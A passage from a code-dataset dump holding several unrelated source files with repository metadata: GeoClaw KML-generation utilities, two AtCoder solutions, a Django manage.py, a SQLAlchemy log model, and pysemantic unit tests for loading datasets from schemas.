d = d + " x[%i] = %s, y[%i] = %s" % (j,f2s(x[j]),j,f2s(y[j]))
kml_text = kml_text + region_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def gauges2kml(rundata=None, fname='gauges.kml', verbose=True):
"""
Create a KML marker for each gauge specified for a GeoClaw run.
:Inputs:
- *rundata* - an object of class *ClawRunData* or None
If *rundata==None*, try to create based on executing function *setrun*
from the `setrun.py` file in the current directory.
- *fname* (str) - resulting kml file.
- *verbose* (bool) - If *True*, print out info about each region found
:Example:
>>> from clawpack.geoclaw import kmltools
>>> kmltools.gauges2kml()
is equivalent to:
>>> from clawpack.geoclaw import kmltools
>>> from setrun import setrun
>>> rundata = setrun()
>>> kmltools.gauges2kml(rundata)
By default this creates a file named *gauges.kml* that can be opened in
Google Earth.
"""
from importlib import reload
if rundata is None:
try:
import setrun
reload(setrun)
rundata = setrun.setrun()
except:
raise IOError("*** cannot execute setrun file")
elev = 0.
kml_text = kml_header(fname)
gauges = rundata.gaugedata.gauges
if len(gauges)==0 and verbose:
print("No gauges found in setrun.py")
for rnum,gauge in enumerate(gauges):
t1,t2 = gauge[3:5]
x1,y1 = gauge[1:3]
gaugeno = gauge[0]
if verbose:
print("Gauge %i: %s, %s \n" % (gaugeno,f2s(x1),f2s(y1)) \
+ " t1 = %s, t2 = %s" % (f2s(t1),f2s(t2)))
mapping = {}
mapping['gaugeno'] = gaugeno
mapping['t1'] = t1
mapping['t2'] = t2
mapping['x1'] = x1
mapping['y1'] = y1
mapping['elev'] = elev
mapping['name'] = 'Gauge %i' % rnum
description = " t1 = %s, t2 = %s\n" % (f2s(t1),f2s(t2)) \
+ " x1 = %s, y1 = %s\n" % (f2s(x1),f2s(y1))
mapping['desc'] = description
gauge_text = kml_gauge(mapping)
kml_text = kml_text + gauge_text
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def kml_header(name='GeoClaw kml file'):
header = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2"
xmlns:gx="http://www.google.com/kml/ext/2.2">
<Document><name>%s</name>
""" % name
return header
def kml_footer():
footer = """
</Document>
</kml>
"""
return footer
def kml_region(mapping, vertex_text=None):
if vertex_text is None:
if 'x3' in mapping:
# quadrilateral with 4 corners specified
vertex_text = """
{x1:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y2:.9f},{elev:.9f}
{x3:.9f},{y3:.9f},{elev:.9f}
{x4:.9f},{y4:.9f},{elev:.9f}
{x1:.9f},{y1:.9f},{elev:.9f}
""".format(**mapping).replace(' ','')
else:
# rectangle with 2 corners specified
vertex_text = """
{x1:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y2:.9f},{elev:.9f}
{x1:.9f},{y2:.9f},{elev:.9f}
{x1:.9f},{y1:.9f},{elev:.9f}
""".format(**mapping).replace(' ','')
mapping['vertices'] = vertex_text
if len(mapping['color'])==6:
mapping['color'] = 'FF' + mapping['color']
kml_text = """
<Style id="Path">
<LineStyle><color>{color:s}</color><width>{width:d}</width></LineStyle>
<PolyStyle><color>00000000</color></PolyStyle>
</Style>
<Placemark><name>{name:s}</name>
<description>{desc:s}</description>
<styleUrl>#Path</styleUrl>
<Polygon>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<outerBoundaryIs><LinearRing><coordinates>
{vertices:s}
</coordinates></LinearRing></outerBoundaryIs>
</Polygon>
</Placemark>
""".format(**mapping)
return kml_text
def kml_line(mapping):
if len(mapping['color'])==6:
mapping['color'] = 'FF' + mapping['color']
line_text = """
{x1:.9f},{y1:.9f},{elev:.9f}
{x2:.9f},{y2:.9f},{elev:.9f}
""".format(**mapping).replace(' ','')
mapping['line'] = line_text
kml_text = """
<Style id="Path">
<LineStyle><color>{color:s}</color><width>{width:d}</width></LineStyle>
<PolyStyle><color>00000000</color></PolyStyle>
</Style>
<Placemark><name>{name:s}</name>
<description>{desc:s}</description>
<styleUrl>#Path</styleUrl>
<LineString>
<tessellate>1</tessellate>
<altitudeMode>clampToGround</altitudeMode>
<coordinates>
{line:s}
</coordinates>
</LineString>
</Placemark>
""".format(**mapping)
return kml_text
def kml_gauge(mapping):
gauge_text = "{x1:.9f},{y1:.9f},{elev:.9f}".format(**mapping).replace(' ','')
mapping['gauge'] = gauge_text
kml_text = """
<Placemark><name>Gauge {gaugeno:d}</name>
<description>{desc:s}</description>
<styleUrl>#markerstyle</styleUrl>
<Point>
<coordinates>
{gauge:s}
</coordinates>
</Point>
</Placemark>
""".format(**mapping)
return kml_text
def kml_timespan(t1,t2,event_time=None,tz=None,tscale=1):
r"""
Create time strings necessary for sliders in Google Earth. The time
span will cover time [t1,t2], with the start of the event given by
event_time.
[t1,t2] : time span,
event_time : Start of event in UTC : [Y,M,D,H,M,S], e.g. [2010,2,27,3,34,0]
tz : time zone offset to UTC. e.g. +3 for Chile; -9 for Japan.
Time span element looks like ::
<TimeSpan>
<begin>2010-02-27T06:34:00+03:00</begin>
<end>2010-02-27T07:04:00+03:00</end>
</TimeSpan>
As for how well this handles Daylight Savings time, here is what the documentation
on the Python 'time' module has to say :
"DST is Daylight Saving Time, an adjustment of the timezone by (usually) one hour
during part of the year. DST rules are magic (determined by local law) and can
change from year to year. The C library has a table containing the local rules
(often it is read from a system file for flexibility) and is the only source of
True Wisdom in this respect."
"""
t1 = t1*tscale # Time converted to seconds
t2 = t2*tscale
import time
# to adjust time from UTC to time in event locale.
if event_time == None:
# Use local time.
starttime = time.mktime(time.localtime()) # seconds UTC
tz_offset = time.timezone/3600.0 # in seconds
else:
ev = tuple(event_time) + (0,0,0) # Extend to 9 tuple; no DST
# mktime returns time in seconds + timezone offset, i.e. seconds UTC
# Subtract out the timezone offset here, since it will get added back
# in when we do gmtime(starttime + ...) below.
starttime = time.mktime(ev) - time.timezone
if tz is None:
print("===> Time zone offset not defined; assuming zero offset. " \
"Set plotdata.kml_tz_offset to define an offset (in hours) from "\
"UTC (positive west of UTC; negative east of UTC)")
tz = 0
tz_offset = tz
if (tz_offset == None):
tzstr = "Z" # no offset; could also just set to "+00:00"
else:
# Google Earth will show time slider time in local time, where
# local + offset = UTC.
tz_offset = tz_offset*3600. # Offset in seconds
tz = time.gmtime(abs(tz_offset))
if (tz_offset > 0):
tzstr = time.strftime("+%H:%M",tz) # Time to UTC
else:
tzstr = time.strftime("-%H:%M",tz)
# Get time strings for start and end of time span
gbegin = time.gmtime(starttime + t1)
timestrbegin = "%s%s" % (time.strftime("%Y-%m-%dT%H:%M:%S", gbegin),tzstr)
gend = time.gmtime(starttime + t2)
timestrend = "%s%s" % (time.strftime("%Y-%m-%dT%H:%M:%S", gend),tzstr)
return timestrbegin,timestrend
def topo2kml(topo_file_name, topo_type, color='00FF00'):
"""
Create a kml file putting a box around the region covered by a topofile.
Color is green by default.
"""
import os
from clawpack.geoclaw import topotools
topo = topotools.Topography(topo_file_name, topo_type=topo_type)
topo.read_header()
xy = topo.extent
name = os.path.splitext(os.path.split(topo_file_name)[-1])[0]
file_name = '%s.kml' % name
box2kml(xy, file_name, name, color)
def dtopo2kml(dtopo_file_name, dtopo_type, color='8888FF'):
"""
Create a kml file putting a box around the region covered by a dtopofile.
Color is pink by default.
"""
import os
from clawpack.geoclaw import dtopotools
dtopo = dtopotools.DTopography()
dtopo.read(dtopo_file_name, dtopo_type)
x1 = dtopo.x.min()
x2 = dtopo.x.max()
y1 = dtopo.y.min()
y2 = dtopo.y.max()
xy = (x1,x2,y1,y2)
name = os.path.splitext(os.path.split(dtopo_file_name)[-1])[0]
file_name = '%s.kml' % name
box2kml(xy, file_name, name, color)
def make_input_data_kmls(rundata, combined=False):
"""
Produce kml files for the computational domain, all gauges and regions
specified, and all topo and dtopo files specified in rundata.
This can be used, e.g. by adding the lines
from clawpack.geoclaw import kmltools
kmltools.make_input_data_kmls(rundata)
to the end of a `setrun.py` file so that `make data` will generate all
kml files in addition to the `*.data` files.
"""
import os
from clawpack.geoclaw import topotools, dtopotools
regions2kml(rundata, combined=combined)
gauges2kml(rundata)
topofiles = rundata.topo_data.topofiles
for f in topofiles:
topo_file_name = f[-1]
topo_type = f[0]
topo2kml(topo_file_name, topo_type)
dtopofiles = rundata.dtopo_data.dtopofiles
for f in dtopofiles:
dtopo_file_name = f[-1]
dtopo_type = f[0]
dtopo2kml(dtopo_file_name, dtopo_type)
def pcolorcells_for_kml(X, Y, Z, png_filename=None, dpc=2, max_inches=15.,
verbose=True, **kwargs):
"""
Wraps pcolormesh in a way that a png file is created that can be viewed
on Google Earth with proper alignment and with sharp grid cell edges.
Works if X,Y are cell centers or edges, and X,Y can be 2d or 1d arrays.
X,Y,Z is the data to be plotted. It is assumed to be finite volume data
where Z[i,j] is a constant value over a grid cell.
Internally x,y are defined as 1d arrays since it is assumed the
grids are Cartesian.
If the length of the 1d arrays x and y match the dimensions of Z then
these are assumed to be cell center values. In this case the arrays
are expanded by one to obtain x_edge, y_edge as edge values,
as needed for proper alignment.
If the length of x,y is already one greater than the corresponding
dimension of Z, then it is assumed that these are already edge values.
If png_filename is not None then a png file is written with appropriate dpi.
dpc is the desired "dots per cell", how many pixels to allot to each
to each grid cell. This should be an integer to avoid interpolation
between cells that smears out the cell boundaries in the png file.
Increasing this will give sharper boundaries but also larger files that
load more slowly.
max_inches is the desired size of the longer edge of the figure created.
This value is not very important unless you want to view the png file
on a screen outside of Google Earth. Internally the dimensions of the
figure `x_inches` and `y_inches` are determined to be consistent
with the value `dpc` specified and a reasonable value of `dpi` for the
png file, as described below.
Internally the value `dpi` (dots per inch) for the png file is
determined so that it is at least 16 and so that:
dpi * x_inches = dcp * x_cells
dpi * y_inches = dcp * y_cells
where `x_cells`, `y_cells` are the number of cells in each direction.
`kwargs` are passed to `pcolormesh`, e.g. `cmap` and `norm` are
generally specified.
This function returns `fig, ax, png_extent, kml_dpi` so the user can further
annotate the figure befor saving it as a png file, which should then
be done with:
plt.savefig(png_filename, transparent=True, dpi=kml_dpi)
The `png_extent` is needed in construcing a kml file to display the
png file on Google Earth, e.g. using the function `png2kml` in this
module.
"""
from matplotlib import pyplot as plt
import numpy as np
# If X is 2d extract proper 1d slice:
if X.ndim == 1:
x = X
elif X.ndim == 2:
if X[0,0] == X[0,1]:
x = X[:,0]
else:
x = X[0,:]
# If Y is 2d extract proper 1d slice:
if Y.ndim == 1:
y = Y
elif Y.ndim == 2:
if Y[0,0] == Y[0,1]:
y = Y[:,0]
else:
y = Y[0,:]
dx = x[1]-x[0]
dy = y[1]-y[0]
if len(x) == Z.shape[1]:
# cell centers, so xedge should be expanded by dx/2 on each end:
xedge = np.arange(x[0]-0.5*dx, x[-1]+dx, dx)
elif len(x) == Z.shape[1]+1:
# assume x already contains edge values
xedge = x
else:
raise ValueError('x has unexpected length')
if len(y) == Z.shape[0]:
# cell centers, so xedge should be expanded by dx/2 on each end:
yedge = np.arange(y[0]-0.5*dy, y[-1]+dy, dy)
elif len(y) == Z.shape[0]+1:
# assume x already contains edge values
yedge = y
else:
raise ValueError('y has unexpected length')
x1 = xedge[0]; x2 = xedge[-1]
y1 = yedge[0]; y2 = yedge[-1]
# Number of grid cells:
x_cells = int(round((x2-x1)/dx))
y_cells = int(round((y2-y1)/dy))
max_cells = max(x_cells, y_cells)
dots_per_cell = dpc
max_dots = dots_per_cell * max_cells
# determine dots per inch for png file, minimum 16:
kml_dpi = max(int(round(max_dots / max_inches)), 16)
dots_x = x_cells * dots_per_cell
dots_y = y_cells * dots_per_cell
# determine dimensions for figsize:
x_inches = dots_x / kml_dpi
y_inches = dots_y / kml_dpi
dpc_x = kml_dpi * x_inches / x_cells
dpc_y = kml_dpi * y_inches / y_cells
if verbose:
print('Using kml_dpi = %i,figure size %.6f by %.6f inches' \
% (kml_dpi,x_inches,y_inches))
print('Figure has %i by %i grid cells of uniform color' \
% (x_cells, y_cells))
print('Dots per cell in x: %.6f, in y: %.6f' % (dpc_x,dpc_y))
print(' These should be integers')
# Create figure of appropriate size and pcolormesh plot
# with no margins, ticks, or labels:
fig = plt.figure(figsize=(x_inches,y_inches))
ax = plt.axes()
plt.axis('off')
pc = plt.pcolormesh(xedge, yedge, Z, **kwargs)
ax.set_xticks([])
ax.set_yticks([])
ax.set_frame_on(False)
fig.set_size_inches(x_inches,y_inches)
plt.subplots_adjust(top = 1, bottom = 0, right = 1, left = 0,
hspace = 0, wspace = 0)
plt.margins(0,0)
if png_filename is not None:
plt.savefig(png_filename, transparent=True, dpi=kml_dpi)
if verbose:
print('Created ',png_filename)
png_extent = [xedge[0], xedge[-1], yedge[0], yedge[-1]]
return fig, ax, png_extent, kml_dpi
def kml_png(mapping):
"""
Create text for a png file overlay
"""
kml_text = """
<GroundOverlay>
<name>{name:s}</name>
<visibility>1</visibility>
<gx:altitudeMode> clampToSeaFloor </gx:altitudeMode>
<Icon>
<href>{png_file:s}</href>
</Icon>
<LatLonBox>
<north>{y2:.9f}</north>
<south>{y1:.9f}</south>
<east>{x2:.9f}</east>
<west>{x1:.9f}</west>
</LatLonBox>
</GroundOverlay>
""".format(**mapping)
return kml_text
def kml_cb(mapping):
"""
Create text for a colorbar png file overlay
"""
kml_text = """
<ScreenOverlay>
<name>{name:s}</name>
<Icon>
<href>{cb_file:s}</href>
</Icon>
<overlayXY x="{xfrac:.4f}" xunits="fraction" y="{yfrac:.4f}" yunits="fraction"/>
<screenXY x="{xfrac:.4f}" xunits="fraction" y="{yfrac:.4f}" yunits="fraction"/>
</ScreenOverlay>
""".format(**mapping)
return kml_text
radio_style_text = """
<Style id="folderStyle">
<ListStyle>
<listItemType>radioFolder</listItemType>
</ListStyle>
</Style>
<styleUrl>#folderStyle</styleUrl>
"""
def png2kml(extent, png_files, png_names=None, name='png_files', fname=None,
radio_style=False, cb_files=None, cb_names=None,
cb_xfracs=None, cb_yfracs=None, verbose=True):
"""
Create a kml file `fname` linking overlays for each png file in `png_files`.
`extent` is [x1,x2,y1,y2] specifying where image should be overlaid.
`png_names`, if present, will give the name for each image for the
Google Earth menu.
If `radio_style` is True, set radio buttons so only one can be shown at a
time, useful for combining plots of different quantities in same file.
"""
import os
if fname is None:
fname = name + '.kml'
x1,x2,y1,y2 = extent
if verbose:
print("Extent: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
kml_text = kml_header(fname) + \
"<name>%s</name>\n" % name + "<open>1</open>\n"
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
for k,png_file in enumerate(png_files):
mapping['png_file'] = png_file
try:
mapping['name'] = png_names[k]
except:
mapping['name'] = 'No name'
kml_text = kml_text + kml_png(mapping)
if radio_style:
kml_text = kml_text + radio_style_text
if cb_files:
# colorbars
for k,cb_file in enumerate(cb_files):
mapping['cb_file'] = cb_file
try:
mapping['name'] = cb_names[k]
except:
mapping['name'] = 'Colorbar'
try:
mapping['xfrac'] = cb_xfracs[k]
except:
mapping['xfrac'] = 0.025 + k*0.075
try:
mapping['yfrac'] = cb_yfracs[k]
except:
mapping['yfrac'] = 0.05
kml_text = kml_text + kml_cb(mapping)
kml_text = kml_text + kml_footer()
kml_file = open(fname,'w')
kml_file.write(kml_text)
kml_file.close()
if verbose:
print("Created ",fname)
def kml_build_colorbar(cb_filename, cmap, cmin=None, cmax=None,
norm=None, label=None, title=None, extend='neither'):
"""
Make a png file with a colorbar corresponding to cmap, norm.
cmin, cmax are used only if nrm is not provided.
"""
import matplotlib.pyplot as plt
import matplotlib as mpl
fig = plt.figure(figsize=(1.2,3))
ax1 = fig.add_axes([0.3, 0.075, 0.20, 0.80])
tick = ax1.yaxis.get_major_ticks()
plt.tick_params(axis='y', which='major', labelsize=8)
if norm is None:
norm = mpl.colors.Normalize(vmin=cmin,vmax=cmax)
cb1 = mpl.colorbar.ColorbarBase(ax1,cmap=cmap,
norm=norm,
extend=extend,
orientation='vertical')
if label:
cb1.set_label(label)
if title:
ax1.set_title(title)
# This is called from plotpages, in <plotdir>.
plt.savefig(cb_filename,Transparent=True)
| [
"[email protected]"
] | |
848e22f57c458f6d6b6d62ebfd4d38411ec32a4d | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03623/s878257952.py | 3b621e177a4b3597998ce1dffd6331ec72409b90 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | import numpy as np
x, a, b = map(int, input().split())
ans = 'A' if np.abs(a-x) < np.abs(b-x) else 'B'
print(ans) | [
"[email protected]"
] | |
10f6230475b7cd896a058d46d101b08a3ccd9aa9 | 1885e952aa4a89f8b417b4c2e70b91bf1df887ff | /ABC163/D.py | 618f915abc6ca69fb1b9175433ddb970de9c633a | [] | no_license | takumiw/AtCoder | 01ed45b4d537a42e1120b1769fe4eff86a8e4406 | 23b9c89f07db8dd5b5345d7b40a4bae6762b2119 | refs/heads/master | 2021-07-10T12:01:32.401438 | 2020-06-27T14:07:17 | 2020-06-27T14:07:17 | 158,206,535 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | import sys
readline = sys.stdin.buffer.readline
MOD = 10 ** 9 + 7
def main():
N, K = map(int, readline().rstrip().split())
ans = 0
m = (N * (N + 1)) // 2
for k in range(K, N+2):
mi = ((k-1) * k) // 2
ma = m - ((N-k) * (N-k+1)) // 2
ans += (ma - mi + 1)
print(ans % MOD)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
33f056391e83925927ed0a1ee7622d51726e6f1b | 8baa00a8c04f64e983532fa4a420c68f490bdaa8 | /devel/lib/python2.7/dist-packages/controller_manager_msgs/srv/__init__.py | 0d59dd77bd5bfaae8a46f01276a690a4799e786e | [] | no_license | samuel-cavalcanti/TIAGo | e52c778f40ba8e03af21ba275b45b7faac5625b3 | 575533f713338b28ee5709279a874c9e374d77bd | refs/heads/master | 2021-04-06T01:32:09.090002 | 2018-03-10T23:51:45 | 2018-03-10T23:51:45 | 124,707,936 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | /home/samuel/tiago_public_ws/devel/.private/controller_manager_msgs/lib/python2.7/dist-packages/controller_manager_msgs/srv/__init__.py | [
"[email protected]"
] | |
8a73ed73df99cfaa28920f158ae86bd17b3931a9 | 854a7abae6ac9611ee206e2fe8853b49bc556040 | /manage.py | 4f2f6156f0a150a56fc18926285ed3cd30f56216 | [] | no_license | crowdbotics-apps/vivek-2505 | 5e97f3f5333ed87969be90623be63f94ae3a54f3 | 668389589c44885ca9a3b2d0a60ff31389bc8b64 | refs/heads/master | 2020-05-15T21:33:27.596420 | 2019-04-21T07:20:39 | 2019-04-21T07:20:39 | 182,502,578 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "vivek_2505.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
5ae57a50894ee06d799ee88acb9132651d570cb8 | 78f54f911d47019da0deeeb6579c7e9e65bb8d21 | /src/scheduler/models/dao/common/Log.py | 1171ab5340bfce2bfeec5a4abb90b01fc98e85fa | [
"MIT"
] | permissive | jedicontributors/pythondataintegrator | 02f8ae1a50cf5ddd85341da738c24aa6a320c442 | 3e877b367ab9b20185476128ec053db41087879f | refs/heads/main | 2023-06-15T07:37:13.313988 | 2021-07-03T15:46:43 | 2021-07-03T15:46:43 | 354,021,102 | 0 | 0 | MIT | 2021-07-03T15:46:44 | 2021-04-02T13:03:12 | Python | UTF-8 | Python | false | false | 913 | py | from sqlalchemy import Column, String, Integer, DateTime
from IocManager import IocManager
from models.dao.Entity import Entity
class Log(Entity, IocManager.Base):
__tablename__ = "Log"
__table_args__ = {"schema": "Common"}
TypeId = Column(Integer, index=True, unique=False, nullable=False)
Content = Column(String(4000), index=False, unique=False, nullable=True)
LogDatetime = Column(DateTime, index=False, unique=False, nullable=True)
JobId = Column(Integer, index=True, unique=False, nullable=True)
def __init__(self,
TypeId: str = None,
Content: str = None,
LogDatetime: DateTime = None,
JobId: int = None,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.TypeId = TypeId
self.Content = Content
self.LogDatetime = LogDatetime
self.JobId = JobId
| [
"[email protected]"
] | |
ed2b58b2eac75fc198b26d5e62452595da90df0d | 3d5c57007b7792328b89eaa55ba27f852997f579 | /pysemantic/tests/test_project.py | 77103f1683b85a04ded533290d3744becd10be41 | [
"BSD-3-Clause"
] | permissive | abhishekarora12/pysemantic | 7b39bed7fe2911c996bd2caf8609f23f3ac58086 | 5e4a08401c6dee62e6e298312e9401e03e952d4b | refs/heads/master | 2020-12-28T22:34:24.415014 | 2015-09-02T07:34:29 | 2015-09-02T07:34:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,742 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2015 jaidev <jaidev@newton>
#
# Distributed under terms of the BSD 3-clause license.
"""Tests for the project class."""
import os.path as op
import os
import tempfile
import shutil
import warnings
import unittest
from ConfigParser import RawConfigParser, NoSectionError
from copy import deepcopy
import pandas as pd
import numpy as np
import yaml
from pandas.io.parsers import ParserWarning
import pysemantic.project as pr
from pysemantic.tests.test_base import (BaseProjectTestCase, TEST_DATA_DICT,
TEST_CONFIG_FILE_PATH, _dummy_postproc)
from pysemantic.errors import MissingProject
from pysemantic.utils import colnames
try:
from yaml import CLoader as Loader
from yaml import CDumper as Dumper
except ImportError:
from yaml import Loader
from yaml import Dumper
try:
import tables
PYTABLES_NOT_INSTALLED = False
except ImportError:
PYTABLES_NOT_INSTALLED = True
try:
import xlrd
XLRD_NOT_INSTALLED = False
except ImportError:
XLRD_NOT_INSTALLED = True
try:
import openpyxl
OPENPYXL_NOT_INSTALLED = False
except ImportError:
OPENPYXL_NOT_INSTALLED = True
class TestProjectModule(BaseProjectTestCase):
"""Tests for the project module level functions."""
def test_get_datasets(self):
"""Test the get_datasets function returns the correct datasets."""
datasets = pr.get_datasets("pysemantic")
ideal = ['person_activity', 'multi_iris', 'iris', 'bad_iris',
'random_row_iris']
self.assertItemsEqual(ideal, datasets)
def test_get_datasets_no_project(self):
"""Test if the get_datasets function works with no project name."""
dataset_names = pr.get_datasets()
self.assertTrue("pysemantic" in dataset_names)
ideal = ['person_activity', 'multi_iris', 'iris', 'bad_iris',
'random_row_iris']
self.assertItemsEqual(dataset_names['pysemantic'], ideal)
def test_add_dataset(self):
"""Test if adding datasets programmatically works fine."""
tempdir = tempfile.mkdtemp()
outpath = op.join(tempdir, "foo.csv")
dframe = pd.DataFrame(np.random.random((10, 10)))
dframe.to_csv(outpath, index=False)
specs = dict(path=outpath, delimiter=',', nrows=10)
try:
pr.add_dataset("pysemantic", "sample_dataset", specs)
parsed_specs = pr.get_schema_specs("pysemantic", "sample_dataset")
self.assertKwargsEqual(specs, parsed_specs)
finally:
shutil.rmtree(tempdir)
with open(TEST_DATA_DICT, "r") as fileobj:
test_specs = yaml.load(fileobj, Loader=Loader)
del test_specs['sample_dataset']
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(test_specs, fileobj, Dumper=Dumper,
default_flow_style=False)
def test_remove_dataset(self):
"""Test if programmatically removing a dataset works."""
with open(TEST_DATA_DICT, "r") as fileobj:
specs = yaml.load(fileobj, Loader=Loader)
try:
pr.remove_dataset("pysemantic", "iris")
self.assertRaises(KeyError, pr.get_schema_specs, "pysemantic",
"iris")
finally:
with open(TEST_DATA_DICT, "w") as fileobj:
yaml.dump(specs, fileobj, Dumper=Dumper,
default_flow_style=False)
def test_get_schema_spec(self):
"""Test the module level function to get schema specifications."""
specs = pr.get_schema_specs("pysemantic")
self.assertKwargsEqual(specs, self.data_specs)
def test_set_schema_fpath(self):
"""Test if programmatically setting a schema file to an existing
project works."""
old_schempath = pr.get_default_specfile("pysemantic")
try:
self.assertTrue(pr.set_schema_fpath("pysemantic", "/foo/bar"))
self.assertEqual(pr.get_default_specfile("pysemantic"),
"/foo/bar")
self.assertRaises(MissingProject, pr.set_schema_fpath,
"foobar", "/foo/bar")
finally:
conf_path = pr.locate_config_file()
parser = RawConfigParser()
parser.read(conf_path)
parser.remove_option("pysemantic", "specfile")
parser.set("pysemantic", "specfile", old_schempath)
with open(TEST_CONFIG_FILE_PATH, "w") as fileobj:
parser.write(fileobj)
def test_add_project(self):
"""Test if adding a project works properly."""
test_project_name = "test_project"
pr.add_project(test_project_name, TEST_DATA_DICT)
# Check if the project name is indeed present in the config file
test_dict = pr.get_default_specfile(test_project_name)
self.assertTrue(test_dict, TEST_DATA_DICT)
def test_remove_project(self):
"""Test if removing a project works properly."""
self.assertTrue(pr.remove_project("test_project"))
self.assertRaises(NoSectionError, pr.get_default_specfile,
"test_project")
class TestProjectClass(BaseProjectTestCase):
"""Tests for the project class and its methods."""
def test_index_column_exclude(self):
"""Test if values are excluded from index column if so specified."""
tempdir = tempfile.mkdtemp()
schema_fpath = op.join(tempdir, "schema.yml")
data_fpath = op.join(tempdir, "data.csv")
df = pd.DataFrame.from_dict({'index': np.arange(10), 'col_a':
np.arange(10)})
df.to_csv(data_fpath, index=False)
schema = {'data': {'path': data_fpath, 'index_col': 'index',
'column_rules': {'index': {'exclude': [1, 2]}}}}
with open(schema_fpath, "w") as fin:
yaml.dump(schema, fin, Dumper=Dumper, default_flow_style=False)
pr.add_project("index_exclude", schema_fpath)
try:
df = pr.Project("index_exclude").load_dataset("data")
self.assertItemsEqual(df.shape, (8, 1))
self.assertEqual(df.index.name, "index")
self.assertNotIn(1, df.index)
self.assertNotIn(2, df.index)
finally:
pr.remove_project("index_exclude")
shutil.rmtree(tempdir)
def test_index_column_rules(self):
"""Test if column rules specified for index columns are enforced."""
schema = {'iris': {'path': self.data_specs['iris']['path'],
'index_col': 'Species',
'dataframe_rules': {'drop_duplicates': False},
'column_rules': {'Species': {'regex': '.*e.*'}}}}
with tempfile.NamedTemporaryFile(delete=False) as f_schema:
yaml.dump(schema, f_schema, Dumper=Dumper, default_flow_style=False)
pr.add_project("index_col_rules", f_schema.name)
try:
project = pr.Project("index_col_rules")
df = project.load_dataset("iris")
self.assertEqual(df.index.name.lower(), 'species')
self.assertNotIn("virginica", df.index.unique())
self.assertItemsEqual(df.shape, (100, 4))
finally:
pr.remove_project("index_col_rules")
os.unlink(f_schema.name)
def test_indexcol_not_in_usecols(self):
"""
Test if the specified index column is added to the usecols
argument."""
schema = {'iris': {'path': self.data_specs['iris']['path'],
'index_col': 'Species',
'use_columns': ['Sepal Length', 'Petal Width']}}
with tempfile.NamedTemporaryFile(delete=False) as f_schema:
yaml.dump(schema, f_schema, Dumper=Dumper, default_flow_style=False)
pr.add_project("testindex_usecols", f_schema.name)
try:
project = pr.Project("testindex_usecols")
df = project.load_dataset("iris")
self.assertEqual(df.index.name, "Species")
self.assertItemsEqual(df.columns, ['Sepal Length', 'Petal Width'])
finally:
pr.remove_project("testindex_usecols")
os.unlink(f_schema.name)
def test_invalid_literals(self):
"""Test if columns containing invalid literals are parsed safely."""
tempdir = tempfile.mkdtemp()
schema_fpath = op.join(tempdir, "schema.yml")
data_fpath = op.join(tempdir, "data.csv")
data = pd.DataFrame.from_dict(dict(col_a=range(10)))
data['col_b'] = ["x"] * 10
data.to_csv(data_fpath, index=False)
schema = {'dataset': {'path': data_fpath, 'dtypes': {'col_a': int,
'col_b': int}}}
with open(schema_fpath, "w") as fin:
yaml.dump(schema, fin, Dumper=Dumper, default_flow_style=False)
pr.add_project("invalid_literal", schema_fpath)
try:
pr.Project("invalid_literal").load_dataset('dataset')
finally:
shutil.rmtree(tempdir)
pr.remove_project("invalid_literal")
def test_index_col(self):
"""Test if specifying the index_col works."""
iris_fpath = self.expected_specs['iris']['filepath_or_buffer']
specs = {'path': iris_fpath, 'index_col': 'Species',
'dataframe_rules': {'drop_duplicates': False}}
pr.add_dataset("pysemantic", "iris_indexed", specs)
try:
df = pr.Project('pysemantic').load_dataset('iris_indexed')
for specie in ['setosa', 'versicolor', 'virginica']:
self.assertEqual(df.ix[specie].shape[0], 50)
finally:
pr.remove_dataset('pysemantic', 'iris_indexed')
def test_multiindex(self):
"""Test if providing a list of indices in the schema returns a proper
multiindexed dataframe."""
pa_fpath = self.expected_specs['person_activity']['filepath_or_buffer']
index_cols = ['sequence_name', 'tag']
specs = {'path': pa_fpath, 'index_col': index_cols, 'delimiter': '\t'}
pr.add_dataset("pysemantic", "pa_multiindex", specs)
try:
df = pr.Project('pysemantic').load_dataset('pa_multiindex')
self.assertTrue(isinstance(df.index, pd.MultiIndex))
self.assertEqual(len(df.index.levels), 2)
seq_name, tags = df.index.levels
org_df = pd.read_table(specs['path'])
for col in index_cols:
x = org_df[col].unique().tolist()
y = df.index.get_level_values(col).unique().tolist()
self.assertItemsEqual(x, y)
finally:
pr.remove_dataset('pysemantic', 'pa_multiindex')
